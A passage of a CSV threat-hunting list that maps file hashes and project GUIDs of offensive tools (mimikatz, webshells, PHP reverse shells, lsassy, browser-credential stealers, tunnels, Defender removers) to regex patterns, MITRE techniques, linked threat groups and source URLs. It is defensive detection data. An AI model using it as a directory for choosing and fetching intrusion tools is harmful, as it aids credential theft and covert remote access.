Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25172" "*3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2*",".{0,1000}3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25173" 
"*3ea13e5df7db6342688575fe5bbc234291a6402d56f96d9b26e2b63240505cef*",".{0,1000}3ea13e5df7db6342688575fe5bbc234291a6402d56f96d9b26e2b63240505cef.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25174" "*3ea656dd07b50bb2fde472461341004a231ab56ef2b3e7922910d38ec98d7278*",".{0,1000}3ea656dd07b50bb2fde472461341004a231ab56ef2b3e7922910d38ec98d7278.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25176" "*3ea8d03618c5dfaf31713be63196e0d2dfba5efbd2e6c6dc1787c6a2c0a41965*",".{0,1000}3ea8d03618c5dfaf31713be63196e0d2dfba5efbd2e6c6dc1787c6a2c0a41965.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25177" "*3EAB01B5-9B49-48D8-BFA1-5493B26CCB71*",".{0,1000}3EAB01B5\-9B49\-48D8\-BFA1\-5493B26CCB71.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","25179" 
"*3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350*",".{0,1000}3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25181" "*3ec15909c169e37f1173d567cb4729f592002826ac0a0f5bf5e820af47195e78*",".{0,1000}3ec15909c169e37f1173d567cb4729f592002826ac0a0f5bf5e820af47195e78.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","25182" "*3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8*",".{0,1000}3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","#filehash","N/A","10","","N/A","","","","25183" "*3ec7beb57b5218a1fcf4586464319ef4d78ca05d00d3eb8ee13be51c8cf38cfa*",".{0,1000}3ec7beb57b5218a1fcf4586464319ef4d78ca05d00d3eb8ee13be51c8cf38cfa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25184" "*3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31*",".{0,1000}3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25185" "*3EC9B9A8-0AFE-44A7-8B95-7F60E750F042*",".{0,1000}3EC9B9A8\-0AFE\-44A7\-8B95\-7F60E750F042.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","#GUIDproject","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","25186" "*3eca25646f5d9435a6d13eaed2781aaa5efad2a3e512e154892f7a5cde46805f*",".{0,1000}3eca25646f5d9435a6d13eaed2781aaa5efad2a3e512e154892f7a5cde46805f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation 
Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25187" "*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*",".{0,1000}3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","25188" "*3ecabb1f5934079ee820bfe9f238ce6d780c2228563f55002a5921b1800118e1*",".{0,1000}3ecabb1f5934079ee820bfe9f238ce6d780c2228563f55002a5921b1800118e1.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","25189" "*3ecff7d62c79b34f0c8bb105a9c624f3148aa59c81ab38d75bc110578bf66ecb*",".{0,1000}3ecff7d62c79b34f0c8bb105a9c624f3148aa59c81ab38d75bc110578bf66ecb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25190" "*3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099*",".{0,1000}3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25191" "*3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8*",".{0,1000}3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25192" 
"*3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8*",".{0,1000}3ee00a42a65d2df9ee571875a11f53b56c8494e90e1e8e60e128aabdb56399c8.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25193" "*3ee46311d18a046c6ade96546e1deac7040ac3fb2f92040d6ad1b7c32c77a6c8*",".{0,1000}3ee46311d18a046c6ade96546e1deac7040ac3fb2f92040d6ad1b7c32c77a6c8.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25197" "*3ee55b131560263d8f4d9a971e7a82e07b9b80db67fd9496ba2d2b0aeeaa2759*",".{0,1000}3ee55b131560263d8f4d9a971e7a82e07b9b80db67fd9496ba2d2b0aeeaa2759.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","25198" "*3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966*",".{0,1000}3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - 
T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","25200" "*3ef06f25d21583d9c1158704c593f3276a1056cf6d23f8c56d8dac84df5320de*",".{0,1000}3ef06f25d21583d9c1158704c593f3276a1056cf6d23f8c56d8dac84df5320de.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","25201" "*3ef598c9422361f5ce5252d0c4261d88889b51c2c9794ca6a72c6669e77526b1*",".{0,1000}3ef598c9422361f5ce5252d0c4261d88889b51c2c9794ca6a72c6669e77526b1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25202" "*3f0aaab9ed83635ff24bf9664603d16e9130183bdb15f55dd02b92d760a97833*",".{0,1000}3f0aaab9ed83635ff24bf9664603d16e9130183bdb15f55dd02b92d760a97833.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","25207" "*3F0C3D9A-CFB8-4DB5-8419-1C28CBC8621D*",".{0,1000}3F0C3D9A\-CFB8\-4DB5\-8419\-1C28CBC8621D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode 
rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","25208" "*3f0ff74a551ec7b47b6509a6ebf6e6ef795c7b770cc3545e2fb8296a5ce4dc05*",".{0,1000}3f0ff74a551ec7b47b6509a6ebf6e6ef795c7b770cc3545e2fb8296a5ce4dc05.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25209" "*3f2699ac7eba269458ed98cc026ecea122a696f8198b3ce7c09381aa9ac7ebda*",".{0,1000}3f2699ac7eba269458ed98cc026ecea122a696f8198b3ce7c09381aa9ac7ebda.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25212" "*3f2c295013df2f758d84f70a59f7510fb1b86a9e01017a0865531b6637c0afe4*",".{0,1000}3f2c295013df2f758d84f70a59f7510fb1b86a9e01017a0865531b6637c0afe4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25214" 
"*3f3804de2f7ecc0b5f86d3b136512c35788c8f0933fffbd11a2350f90084106d*",".{0,1000}3f3804de2f7ecc0b5f86d3b136512c35788c8f0933fffbd11a2350f90084106d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25217" "*3f3a5c2cf1feee383a348a89709d74af305d4c5dfd3d88150ec1189fadc76877*",".{0,1000}3f3a5c2cf1feee383a348a89709d74af305d4c5dfd3d88150ec1189fadc76877.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25218" "*3f3dfb593302ddb3b356daea1e47c3ffdeb0f304f5eef51b7aeecd1b2f15538f*",".{0,1000}3f3dfb593302ddb3b356daea1e47c3ffdeb0f304f5eef51b7aeecd1b2f15538f.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","0","#filehash","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","25221" "*3f460ca63fd331cff0f5f7e7947513822b5a9fdf43ad10e551fd785b2de0adf3*",".{0,1000}3f460ca63fd331cff0f5f7e7947513822b5a9fdf43ad10e551fd785b2de0adf3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25223" 
"*3f48b595aeca862631b678662a78fe1951a607a10f0a6593a2cc86c7acb4929c*",".{0,1000}3f48b595aeca862631b678662a78fe1951a607a10f0a6593a2cc86c7acb4929c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25225" "*3f4a0c9d63796dc8d7d2bb3947edf3a2722c9e783e7c7fdfa7e13f2b43eafdc3*",".{0,1000}3f4a0c9d63796dc8d7d2bb3947edf3a2722c9e783e7c7fdfa7e13f2b43eafdc3.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25226" "*3f4dc752db705589bdb8e487a55dbdc6891c13c557ec0383701fc5b94d8f8264*",".{0,1000}3f4dc752db705589bdb8e487a55dbdc6891c13c557ec0383701fc5b94d8f8264.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25227" "*3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e*",".{0,1000}3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","25229" 
"*3F5558BD-7B94-4CB0-A46C-A7252B5BCA17*",".{0,1000}3F5558BD\-7B94\-4CB0\-A46C\-A7252B5BCA17.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","25230" "*3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed*",".{0,1000}3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25231" "*3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f*",".{0,1000}3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","25232" "*3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f*",".{0,1000}3f5ea2764696b07fdb61c7b34736eae26518ed2e36a624df09fb37025659201f.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","25233" "*3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f*",".{0,1000}3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","25234" "*3f6a6c6beb96c55ae02199bf8ca34d317596dddab33ef5e1f1d129e4d8d36446*",".{0,1000}3f6a6c6beb96c55ae02199bf8ca34d317596dddab33ef5e1f1d129e4d8d36446.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25235" "*3f6ee397df853f26f467795a8112996db83b6db7f832c332964c954ee4cf7cd8*",".{0,1000}3f6ee397df853f26f467795a8112996db83b6db7f832c332964c954ee4cf7cd8.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25237" "*3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a*",".{0,1000}3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25238" "*3f7216ab8b49c48f550b68c1e5b8d55f10ff60506090ff19e8b6654186b7bf5c*",".{0,1000}3f7216ab8b49c48f550b68c1e5b8d55f10ff60506090ff19e8b6654186b7bf5c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25239" "*3f731e2fb08a9113084dcbffa31890d2b42c817f8ae6da445502130b7e5f512b*",".{0,1000}3f731e2fb08a9113084dcbffa31890d2b42c817f8ae6da445502130b7e5f512b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25240" 
"*3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb*",".{0,1000}3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25242" "*3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194*",".{0,1000}3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25243" "*3f890ba7237462ed2d3fdfc82d5c6b67ae06fdc134d3a174a2e0b1c7b931204e*",".{0,1000}3f890ba7237462ed2d3fdfc82d5c6b67ae06fdc134d3a174a2e0b1c7b931204e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - 